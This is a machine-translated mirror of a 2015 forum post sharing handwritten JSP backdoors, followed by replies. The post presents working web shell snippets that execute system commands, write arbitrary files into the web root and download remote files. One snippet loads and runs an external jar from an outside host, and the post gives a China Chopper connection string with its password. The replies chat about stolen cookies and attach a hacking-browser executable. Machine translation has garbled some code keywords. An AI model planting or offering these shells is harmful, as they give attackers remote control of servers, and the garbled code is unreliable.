이 글은 기계 번역의 미러 문서이며, 원본 기사로 바로 이동하려면 여기를 클릭해 주세요.

보기: 14991|회답: 7

[보안 도구] 손글씨 JSP 백도어

[링크 복사]
게시됨 2015. 1. 2. 오후 6:46:57 | | | |
이전: http://p2j.cn/?p=1627
1. 시스템 명령어 실행:
에코 없이 시스템 명령 실행:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
요청: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
실행 후에는 에코가 없어서 바운스 셸에 매우 편리합니다.
비밀번호 검증과 관련된 에코가 있습니다:
<% if("023".equals(request.getParameter("pwd")){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i").getInputStream();        int a = -1;        바이트[] b = 새 바이트[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>");    }%>
요청: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. 문자열을 인코딩하여 지정된 파일에 기록합니다:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes();%>
요청: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
웹 디렉토리에 쓰기:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes();%>
요청: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
요청: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
웹 디렉토리에 쓰기:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
요청: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: 원격 파일 다운로드 (apache io utils를 사용하지 않으면 입력스트림을 바이트로 변환할 수 없어서 매우 길습니다...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    바이트[] b = 새 바이트[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    반면 ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
요청: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
웹 경로로 다운로드:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    바이트[] b = 새 바이트[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    반면 ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f").write(baos.toByteArray()); %>
요청: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
넷째: Reflection이 외부 병을 호출해 뒷문을 완벽하게 만들었다
위의 백도어 기능이 너무 약하고 구식이라면 이걸 시도해 보세요:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u")))).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
요청: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

주방용 칼 연결부: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, 비밀번호 023.

해결책:
리플렉션을 사용해 외부 jar를 현재 애플리케이션에 불러오고, 리플렉션은 출력 처리 결과를 실행합니다. request.getParameterMap()은 요청된 모든 매개변수를 포함합니다. 외부 jar 패키지가 로드되어 있으므로, 서버는 이 jar 주소에 접근할 수 있어야 합니다.




이전의:TXT 텍스트 파일 뒤에 숨겨진 위기
다음:Java MD5 암호화, Base64 암호화 및 복호화 Java 시스템 명령 소스 코드를 실행합니다
게시됨 2015. 1. 2. 오후 8:17:30 |
최근에 JSP 백도어를 조사하고 있나요?
 집주인| 게시됨 2015. 1. 2. 오후 8:39:44 |
관리자가 2015-1-2 20:17에 게시됨
최근에 JSP 백도어를 조사하고 있나요?

한 문장으로 JSP를 본 적 있나요? 찾았지만 깊이 공부하지 않았고, xss를 이해하지 못했으며, 어제 드디어 쿠키를 받았는데, 쿠키 업로드를 어떻게 수정해야 할지 모르겠어요
게시됨 2015. 1. 2. 오후 8:44:40 |
Delver_Si 2015-1-2 20:39에 게시됨
한 문장으로 JSP를 본 적 있나요? 찾았어요, 더 깊이 파고들지 않았고, 이해도 못 했어요, 어제 드디어 쿠키를 받았는데, 요리를 어떻게 변형해야 할지 모르겠어요...

개인 서명 파일로 제 쿠키가 도난당하는 것은 아닙니다,,,

Firefox의 HackBar 플러그인을 사용하세요
게시됨 2015. 1. 2. 오후 8:48:57 |
Delver_Si 2015-1-2 20:39에 게시됨
한 문장으로 JSP를 본 적 있나요? 찾았어요, 더 깊이 파고들지 않았고, 이해도 못 했어요, 어제 드디어 쿠키를 받았는데, 요리를 어떻게 변형해야 할지 모르겠어요...

고스트 브라더 다기능 브라우저 v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, 다운로드 횟수: 7, 판매 가격: 1 그레인 MB)
 집주인| 게시됨 2015. 1. 2. 오후 8:57:50 |
관리자가 2015-1-2 20:44에 게시됨
개인 서명 파일로 제 쿠키가 도난당하는 것은 아닙니다,,,

Firefox의 HackBar 플러그인을 사용하세요

어제는 무료 출입문이 심하게 흔들렸고, 연결도 안 됐고 파이어폭스 스토어에도 들어갈 수 없었어요.
 집주인| 게시됨 2015. 1. 2. 오후 8:59:01 |
관리자가 2015-1-2 20:44에 게시됨
개인 서명 파일로 제 쿠키가 도난당하는 것은 아닙니다,,,

Firefox의 HackBar 플러그인을 사용하세요

DZ는 이런 허점이 없습니다
게시됨 2015. 1. 2. 오후 9:00:22 |
Delver_Si 2015-1-2 20:59에 게시됨
DZ는 이런 허점이 없습니다

모르겠어요, 테스트해보세요, 제 데이터베이스 망치지 마세요   

우리는 모두 토르 브라우저를 사용해 벽을 돌아다닙니다

면책 조항:
Code Farmer Network에서 발행하는 모든 소프트웨어, 프로그래밍 자료 또는 기사는 학습 및 연구 목적으로만 사용됩니다; 위 내용은 상업적 또는 불법적인 목적으로 사용되지 않으며, 그렇지 않으면 모든 책임이 사용자에게 부담됩니다. 이 사이트의 정보는 인터넷에서 가져온 것이며, 저작권 분쟁은 이 사이트와는 관련이 없습니다. 위 내용은 다운로드 후 24시간 이내에 컴퓨터에서 완전히 삭제해야 합니다. 프로그램이 마음에 드신다면, 진짜 소프트웨어를 지원하고, 등록을 구매하며, 더 나은 진짜 서비스를 받아주세요. 침해가 있을 경우 이메일로 연락해 주시기 바랍니다.

Mail To:help@itsvse.com